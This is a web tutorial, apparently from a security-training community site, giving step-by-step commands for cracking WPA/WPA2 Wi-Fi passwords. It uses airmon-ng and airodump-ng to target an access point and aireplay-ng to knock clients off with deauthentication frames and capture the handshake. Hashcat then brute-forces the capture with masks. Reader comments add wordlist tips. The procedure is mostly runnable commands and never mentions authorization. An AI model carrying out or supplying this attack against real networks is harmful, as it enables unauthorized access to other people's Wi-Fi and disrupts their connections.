Use GPU to Speed Up WPA/WPA2 Password Cracking

August 27, 2015 | Views: 51693

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.

The tools used will be (available for both windows and Linux.)

  1. Aircrack-ng
  2. Oclhashcat

This guide assumes the following things:

  • wlan0                             is a WiFi interface
  • mon0                             is the interface in monitor mode
  • <channel>                     refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)
  • # (hash symbol)           is used to mark start of a command

 

Steps:

Open up a terminal

Start by putting Wi-Fi interface in monitor mode

#airmon-ng start wlan0

This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.

Then, start sniffing air for all AP’s in the area.

#airodump-ng mon0

This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.

Press Ctrl+C to stop above command and type:

#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0

 

This command only sniffs for one specific AP:
-c tells which channel to sniff
-bssid is the MAC of AP to target
-w tell to write a file to capture handshake (for later use in recovering password)
mon0 is the monitor interface

Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.

 

Now, open a second terminal and type:

#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0

This command says to de-authenticate a client from its AP
-0 tell how many time to send deauth signal (in this case 5 times)
-a tell the MAC of AP
-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)

mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).

Once handshake file is captured and written (in format file.cap), clean the file using the following command:

#wpaclean clean_file.cap captured.cap

Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured).

 

Now, prepare the file for hashcat by:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension)

 

Now, begin the cracking process by:

#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask

Here, –m 2500 tell to crack WPA/WPA2
-a 3 tells to use brute-force or mask based brute force (more on it later)
-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)
/for_cat.hccap is path to your captured and cleaned prepared hashcat file
/mymask.hccap is path to the mask file

Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali)

 

NOTES ON HASHCAT MASKS

The mask can take following format:

  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for numbers
  • ?s for symbols (ASCII only I think)
  • ?a use all of the above characters

Thus to create a mask type in a black file:

  • ?d?d?d?d?d?d?d?d for a 8 digit password

 

That’s it for this tutorial. Honorable mention goes to blackMORE Ops.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
19 Comments
  1. Its now just HashCat (oclHashcat has been depreciated)
    I’ve gotten a LOT of success just using phone numbers and rockyou.txt.

    WPA is kinda a slow hash to crack, so good rule sets are your best friend here along with a good dictionary.
    Straight up BF’ing is not worthwhile without a GPU farm.
    Most people do not use long hard to type WiFi passwords.

    Now, any chance on a WPA-Enterprise tut?

  2. sure the video will be more of help

Page 4 of 4«1234
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 741 / December 14, 2019
How do I Get MTA Certified?
Views: 1313 / December 12, 2019
How much does your PAM software really cost?
Views: 1750 / December 10, 2019
How Do I Get into Android Development?
Views: 2140 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel